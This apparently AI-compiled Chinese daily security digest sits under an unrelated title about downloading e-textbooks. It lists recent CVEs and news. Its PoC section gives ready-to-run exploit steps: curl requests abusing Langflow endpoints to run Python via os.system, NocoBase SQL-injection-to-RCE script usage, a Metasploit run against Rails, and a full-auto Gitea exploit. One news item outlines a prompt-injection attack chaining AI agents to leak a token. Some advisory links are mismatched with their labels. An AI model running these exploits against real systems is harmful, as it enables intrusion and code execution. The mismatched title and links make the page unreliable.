三步掌握国家中小学智慧教育平台电子课本PDF免费下载技巧
2026/8/5 14:57:16
# 每日安全情报报告 · 2026-08-05 > **由 AI 整理发布** > 覆盖范围:2026-08-03 至 2026-08-05(近 24–48 小时新增/在野利用漏洞与情报)。 > 风险标注:**【严重】** CVSS ≥ 9.0 | **【高危】** 7.0 ≤ CVSS < 9.0 | **【在野利用】** 已被 CISA KEV 或厂商确认实战利用。 --- ## 一、重点提示(Executive Summary) - **Adobe Campaign Classic 紧急修复一波"零点击、零认证"漏洞(APSB26-120,8/3)**:CVE-2026-48331(SSRF)、CVE-2026-48323(模板注入)、CVE-2026-48330(SQLi)三项 CVSS 均满分 10.0,攻击者无需凭据与交互即可在本地/混合部署的营销服务器上执行任意代码,建议立即升级到 build 9399。 - **CISA KEV 8/4 一口气新增 3 项在野漏洞**:IBM Langflow 代码注入 **CVE-2026-9198(CVSS 9.8)**、Apache Tomcat **CVE-2026-34486(CVSS 7.5)**、N-able N-central **CVE-2026-18556**。其中 Langflow 默认部署即可被未认证者取得 SUPERUSER 并实现完整 RCE,BOD 修复截止日 **2026-08-07**。 - **N-able N-central 认证绕过链条已实际攻陷 MSP 客户**:CVE-2026-18577 是 CVE-2026-18556 的"不完整补丁",CISA 8/3 列入 KEV,BOD 截止 **2026-08-06**。攻击者在补全补丁前已通过 Take Control + Cloudflare 隧道持久化。 - **AI/LLM 基础设施持续成为重灾区**:Veeam ONE 代理主机未认证 RCE(CVE-2026-64633,10.0)、HashiCorp Terraform MCP Server 跨租户凭据重用(CVE-2026-16498,10.0)、SiYuan 笔记未认证 SQL 注入(CVE-2026-69084,9.9/10.0)、NocoBase SQLi→PG 超级用户 RCE(CVE-2026-52887,10.0,公开 PoC)。 - **公开可利用 PoC 集中爆发**:NocoBase CVE-2026-52887、Rails "KindaRails2Shell" CVE-2026-66066(已集成 Metasploit)、Langflow CVE-2026-9198 均已有可复现利用,请在授权环境中尽快验证与修补。 --- ## 二、最新高危漏洞 ### 2.1 在野利用漏洞(CISA KEV 重点标注) | CVE 编号 | 漏洞类型 | 受影响组件 | CVSS | 风险 | 链接 | |----------|----------|------------|------|------|------| | CVE-2026-9198 | 代码注入(未认证 RCE) | IBM Langflow OSS 1.0.0–1.10.0 | 9.8 | 【严重】【在野利用】 | [IBM 安全公告](https://www.ibm.com/support/pages/node/7278927) | [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-9198) | | CVE-2026-18577 | 认证绕过(CVE-2026-18556 的不完整补丁) | N-able N-central(< 2026.3.1.7) | 8.2 | 【高危】【在野利用】 | [CISA KEV 条目](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-18577) | [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-18577) | | CVE-2026-18556 | 认证绕过(使用备用路径/通道) | N-able N-central | 8.2 | 【高危】【在野利用】 | [CISA KEV 条目](https://www.cisa.gov/kev) | [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-18556) | | CVE-2026-34486 | 加密缺失(EncryptInterceptor 绕过) | Apache Tomcat 11.0.20 / 10.1.53 / 9.0.116 | 7.5 | 【高危】【在野利用】 | [Apache 邮件列表公告](https://lists.apache.org/thread/9510k5p5zdvt9pkkgtyp85mvwxo2qrly) | [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-34486) | > **在野漏洞修复截止提醒**:CVE-2026-18577 的 BOD 26-04 截止日为 **2026-08-06**,CVE-2026-9198 / CVE-2026-34486 截止日为 **2026-08-07**,联邦及面向公网资产务必优先处置。 ### 2.2 其他严重 / 高危漏洞(近 48 小时新增) | CVE 编号 | 漏洞类型 | 受影响组件 | CVSS | 风险 | 链接 | |----------|----------|------------|------|------|------| | CVE-2026-48330 / CVE-2026-48331 / CVE-2026-48323 | SQL 注入 / SSRF / 模板注入(均零交互、零认证 RCE) | Adobe Campaign Classic(ACC)v7.4.3 build 9398 及更早 | 10.0 | 【严重】 | [Adobe APSB26-120](https://helpx.adobe.com/security/products/campaign/apsb26-120.html) | [分析报道](https://hackersradar.com/critical-adobe-campaign-classic-flaws-let-attackers-run-code) | | CVE-2026-48326 | SQL 注入(需低权限账户) | Adobe Campaign Classic | 9.9 | 【严重】 | [Adobe 安全公告](https://helpx.adobe.com/security/products/campaign/apsb26-120.html) | | CVE-2026-48333 / CVE-2026-48317 | 授权缺陷 / eval 注入 | Adobe Campaign Classic | 9.8 / 9.6 | 【严重】 | [Adobe 安全公告](https://helpx.adobe.com/security/products/campaign/apsb26-120.html) | | CVE-2026-64633 | 远程未认证代码执行(代理主机) | Veeam ONE 13.0.2.6723 及更早 13.x | 10.0(v4.0) | 【严重】 | [Veeam KB4892](https://veeam.com/kb4892) | [GitHub 公告](https://github.com/advisories/GHSA-xw3v-hx8p-r8v7) | | CVE-2026-69084 | SQL 注入(未认证,可达匿名) | SiYuan 笔记 ≤ v3.7.2 | 9.9(v4.0)/ 10.0(v3.1) | 【严重】【公开 PoC】 | [GitHub 公告 GHSA-vh22-h7hf-www7](https://github.com/advisories/GHSA-p2x7-4c4p-8wh6) | [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-69084) | | CVE-2026-69085 | SQL 注入(/api/filetree/searchDocs) | SiYuan 笔记 < v3.7.3 | 10.0(v3.1)/ 9.9(v4.0) | 【严重】 | [IONIX 分析](https://www.ionix.io/threat-center/cve-2026-69085) | [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-69085) | | CVE-2026-16498 | 跨租户凭据重用(无状态 HTTP 模式) | HashiCorp Terraform MCP Server 0.2.1–1.0.0 | 10.0 | 【严重】 | [HashiCorp HCSEC-2026-23](https://discuss.hashicorp.com/t/hcsec-2026-23-multiple-vulnerabilities-impacting-hashicorp-terraform-mcp-server/77606) | [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-16498) | | CVE-2026-16496 / CVE-2026-14869 | 授权绕过(有状态缓存)/ 未认证 SSRF | HashiCorp Terraform MCP Server | 8.9 / 8.6 | 【高危】 | [HashiCorp HCSEC-2026-23](https://discuss.hashicorp.com/t/hcsec-2026-23-multiple-vulnerabilities-impacting-hashicorp-terraform-mcp-server/77606) | | CVE-2026-24254 | 越界写(多模态服务拓扑) | NVIDIA Dynamo for Linux | 9.8 | 【严重】 | [NVIDIA 产品安全](https://github.com/NVIDIA/product-security/tree/main/2026/5842) | [GitHub 公告](https://github.com/advisories/GHSA-4gq3-gh66-qq8g) | | CVE-2026-58048 | 认证用户以数据库 root 执行 SQL(越权) | cPanel & WHM(所有受支持版本)/ WP Squared | 9.4(v4.0) | 【高危】 | [The Hacker News 报道](https://thehackernews.com/) | | CVE-2026-52887 | SQL 注入 → PostgreSQL 超级用户 RCE | NocoBase ≤ 2.0.60 | 10.0 | 【严重】【公开 PoC】 | [NocoBase 公告 GHSA-p849-8hwh-84j9](https://github.com/nocobase/nocobase/security/advisories/GHSA-p849-8hwh-84j9) | [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-52887) | | CVE-2026-67192 / CVE-2026-67191 / CVE-2026-67193 | 栈溢出 RCE / 堆溢出 / 信息泄露(均预认证) | Xlight FTP Server < 3.9.5 | 9.3 / 8.1 / — | 【严重】 | [安全公告](https://ti.dbappsecurity.com.cn/security-info/bulletin?id=15860) | | CVE-2026-50343 | 本地权限提升("Dark Elevator") | Windows InstallService(微软 7 月补丁已修) | 7.8 | 【高危】【PoC 已公开】 | [利用分析](https://ti.dbappsecurity.com.cn/security-info/bulletin?id=15865) | | CVE-2026-66066 | 任意文件读 → RCE(KindaRails2Shell) | Rails Active Storage(7.2<3.2 / 8.0<5.1 / 8.1<3.1,需 libvips≥8.13) | 9.5(v4.0)/ 9.8(v3.1) | 【严重】【公开 PoC】 | [Rails 安全公告 GHSA-xr9x-r78c-5hrm](https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm) | [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-66066) | --- ## 三、最新漏洞 PoC(含使用步骤) > **合规声明**:以下 PoC 仅供授权测试与防御研究使用,严禁用于未授权目标。 ### 3.1 CVE-2026-9198 — IBM Langflow 未认证 RCE(在野) - **来源 / 链接**:[Yazoul 技术分析(含 PoC 思路)](https://www.yazoul.net/advisory/cve/cve-2026-9198-langflow-unauthenticated-rce-exploited-in-wild-poc) | [IBM 公告](https://www.ibm.com/support/pages/node/7278927) - **漏洞类型**:代码注入(CWE-94),链式利用 `/api/v1/auto_login` + `/api/v1/validate/code` - **利用步骤(手动复现,无需依赖安装)**: ```bash # 第 1 步:向 auto_login 端点请求,获取 SUPERUSER 令牌(默认配置下无需任何凭据) curl -X POST http://TARGET:7860/api/v1/auto_login # 第 2 步:使用返回的 Bearer 令牌,通过 validate/code 端点提交任意 Python 载荷 curl -X POST http://TARGET:7860/api/v1/validate/code \ -H "Authorization: Bearer <上一步获取的token>" \ -H "Content-Type: application/json" \ -d '{"code":"import os; os.system(\"id > /tmp/poc.txt\")"}' ``` - **修复**:升级 Langflow OSS 至 **1.10.1**;临时缓解——限制网络暴露、在反向代理层封禁上述两个端点、设置 `LANGFLOW_AUTO_LOGIN=false`。 ### 3.2 CVE-2026-52887 — NocoBase SQLi → PostgreSQL 超级用户 RCE - **来源 / 链接**:[公开 PoC 仓库(含 exploit.py 与 Docker 实验环境)](https://github.com/BiiTts/CVE-2026-52887-NocoBase-SQLi-RCE) | [NocoBase 公告](https://github.com/nocobase/nocobase/security/advisories/GHSA-p849-8hwh-84j9) - **漏洞类型**:SQL 注入(CWE-89)→ 堆叠语句 → `COPY ... TO PROGRAM` 系统命令执行 - **依赖**:Python 3,Docker(启动测试环境) - **使用步骤**: ```bash git clone https://github.com/BiiTts/CVE-2026-52887-NocoBase-SQLi-RCE.git cd CVE-2026-52887-NocoBase-SQLi-RCE # 启动漏洞环境(默认 auth-basic 允许自助注册,故实际可达未认证) docker run -d --name nb-pg --network host \ -e POSTGRES_USER=nocobase -e POSTGRES_PASSWORD=nocobase -e POSTGRES_DB=nocobase postgres:16 docker run -d --name nb-app --network host \ -e DB_DIALECT=postgres -e DB_HOST=127.0.0.1 -e DB_PORT=5432 \ -e DB_DATABASE=nocobase -e DB_USER=nocobase -e DB_PASSWORD=nocobase \ -e APP_KEY=change-me -e APP_PORT=13000 nocobase/nocobase:2.0.57 # 执行 PoC(自动注册 + 登录 + 触发 COPY TO PROGRAM RCE) python3 exploit.py -u http://127.0.0.1:13000 --cmd "id > /tmp/proof 2>&1" docker exec nb-pg cat /tmp/proof # 验证以 postgres OS 用户执行 ``` - **修复**:升级 NocoBase 至 **2.0.61**;临时缓解——将数据库用户降权(取消 SUPERUSER)、在 WAF 层过滤 `filter[latestMsgReceiveTimestamp][$lt]` 中的非数字字符。 ### 3.3 CVE-2026-66066 — Rails Active Storage "KindaRails2Shell" 任意文件读 → RCE - **来源 / 链接**:[Rails 安全公告 GHSA-xr9x-r78c-5hrm](https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm) | [Ethiack 研究(KindaRails2Shell)](https://ethiack.com/info-hub/research/kindarails2shell-rails-rce-cve-2026-66066) | [Metasploit 模块(jburgess-r7)](https://github.com/rapid7/metasploit-framework) - **漏洞类型**:libvips 未禁用"unfuzzed"加载器 → 上传构造文件触发变体处理 → 读取 `/proc/self/environ`(含 `secret_key_base`)→ 伪造签名实现 RCE - **使用步骤(Metasploit 自动化)**: ```bash # 需已安装 Metasploit Framework msfconsole use exploit/multi/http/rails_kindarails2shell set RHOSTS <目标主机> set TARGETURI / set VPS_MIN_VERSION 8.13 # 要求目标 libvips >= 8.13 run ``` - **修复**:升级 Active Storage 至 **7.2.3.2 / 8.0.5.1 / 8.1.3.1**(且 libvips ≥ 8.13);必须**轮换**所有可能已被读取的密钥(secret_key_base、云凭证、数据库凭证);临时缓解——设置环境变量 `VIPS_BLOCK_UNTRUSTED=true` 或调用 `Vips.block_untrusted(true)`。 ### 3.4 CVE-2026-60004 — Gitea 预认证 RCE(持续在野,附完整 PoC) - **来源 / 链接**:[公开 PoC 仓库(Python,仅用标准库)](https://github.com/imbas007/CVE-2026-60004-POC) | [GitHub 公告](https://github.com/advisories/GHSA-xr9x-r78c-5hrm) - **漏洞类型**:diffpatch 端点 Git hook 注入(CWE-94),CVSS 9.8,默认开放注册 - **依赖**:Python 3.7+(无需 pip 安装) - **使用步骤**: ```bash git clone https://github.com/imbas007/CVE-2026-60004-POC.git cd CVE-2026-60004-POC # 全自动化:注册 + 建仓 + 利用 + 取回结果 python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode full-auto --cmd "id" # 仅检测(非侵入) python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode check ``` - **修复**:升级 Gitea 至已修复版本并关闭不必要的公开注册;临时缓解——限制 `/api/v1/repos/{owner}/{repo}/diffpatch` 端点访问。 --- ## 四、网络安全最新文章 1. **Google 删除 3 个 ADK AI 工作流:恶意 GitHub Issue 可触发特权 Agent(Agent 间攻击首例)** — Pillar Security 演示公开 triage Agent 被提示注入后跨信任边界调用高权限 code-fixing Agent,导致 CI runner 代码执行与 bot PAT 泄露。 [阅读原文(The Hacker News)](https://thehackernews.com/2026/08/google-deletes-3-adk-ai-workflows-after.html) | [FreeBuf 中文报道](https://www.freebuf.com/articles/ai-security/493568.html) 2. **cPanel 严重漏洞允许托管客户以数据库 root 执行 SQL(CVE-2026-58048)** — 认证用户可越过账户边界,在数据库 root 上下文执行任意 SQL,高危托管环境需尽快打补丁。 [阅读原文(The Hacker News)](https://thehackernews.com/) 3. **DOUBLECUP 利用 ClickFix 与浏览器缓存 PNG 投递 CountLoader 和 DeviceManager RAT** — 俄罗斯 LaaS,将隐写 PNG 植入浏览器缓存,以受害人公网 IP 作为解密密钥实现环境锁定,DeviceManager 用 EtherHiding(区块链)解析 C2。 [阅读原文(BleepingComputer)](https://www.bleepingcomputer.com/news/security/new-doublecup-clickfix-service-hides-malware-in-browser-cache-images/) 4. **CISA 将 N-able N-central 漏洞加入 KEV(已有客户被攻陷)** — 认证绕过在初次修复后仍被用于入侵 MSP 客户,攻击者借 Take Control 与 Cloudflare 隧道持久化。 [阅读原文(The Hacker News)](https://thehackernews.com/) 5. **N-able:攻击者攻陷 N-central 服务器(初次修复不完整)** — 攻击链细节披露,强调 RMM/MSP 平台已成为系统性高危入口。 [阅读原文(The Hacker News)](https://thehackernews.com/) 6. **Hugging Face Diffusers 三漏洞可绕过 trust_remote_code 执行任意代码(FaceHugger)** — 自定义管道加载过程中绕过安全护栏,AI 供应链风险,已修复于 0.38.0。 [阅读原文(The Hacker News)](https://thehackernews.com/2026/08/hugging-face-diffusers-flaws-could-let.html) 7. **Adobe 紧急修复 Campaign Classic 高危漏洞(三个 10 分未授权 RCE)** — APSB26-120 修复 SSRF/模板注入/SQLi 等多项零交互漏洞,本地与混合部署须升级 build 9399。 [阅读原文(HackersRadar)](https://hackersradar.com/critical-adobe-campaign-classic-flaws-let-attackers-run-code) 8. **Xlight FTP 服务器曝出三个预认证漏洞(最严重可达 RCE)** — 影响 3.9.5 之前版本,SSH GCM 处理中的栈/堆溢出,官方已发布 3.9.5 修复。 [查看详情(安全公告)](https://ti.dbappsecurity.com.cn/security-info/bulletin?id=15860) 9. **CVE-2026-50343 "Dark Elevator" Windows 本地提权利用代码公开** — InstallService 逻辑缺陷允许标准用户提升至 SYSTEM,无需 UAC 或重启,可靠性高。 [查看详情(安全公告)](https://ti.dbappsecurity.com.cn/security-info/bulletin?id=15865) 10. **HashiCorp Terraform MCP Server 严重漏洞 CVSS 10.0(跨租户凭据重用)** — AI Agent 集成场景下的隔离失效,升级至 1.1.0。 [查看详情(安全公告)](https://ti.dbappsecurity.com.cn/security-info/bulletin?id=15863) 11. **OpenAI 披露网络犯罪分子如何利用 ChatGPT 运营诈骗行动** — 犯罪网络利用 ChatGPT 创建虚假身份与欺诈网站,实施婚恋、投资诈骗并关联强迫劳动。 [阅读原文(FreeBuf)](https://www.freebuf.com) 12. **CareCloud 数据泄露:约 34.5 万患者健康记录、SSN 与财务数据暴露** — AWS 环境在 3 月被未授权访问,影响 4.5 万+ 医疗服务提供者。 [阅读原文(Enigma 日报)](https://www.enigma-global.com/blog/daily-digest-2026-08-04) 13. **XCSSET v40 卷土重来:通过中毒 Xcode 项目攻击 macOS** — 重大重构,几乎全内存运行并具备强多态与反检测能力,劫持 Chrome 与 Telegram。 [阅读原文(Enigma 日报)](https://www.enigma-global.com/blog/daily-digest-2026-08-04) 14. **Open WebUI 单批次披露 17 个 CVE** — 含存储型 XSS、同源 XSS 账户接管、SSRF、OAuth 令牌交换接管等高危问题(CVE-2026-70492 等)。 [查看详情(CVE 跟踪)](https://cve-dev.imfht.com/detail/CVE-2026-70494) --- > *部分内容由 AI 辅助生成*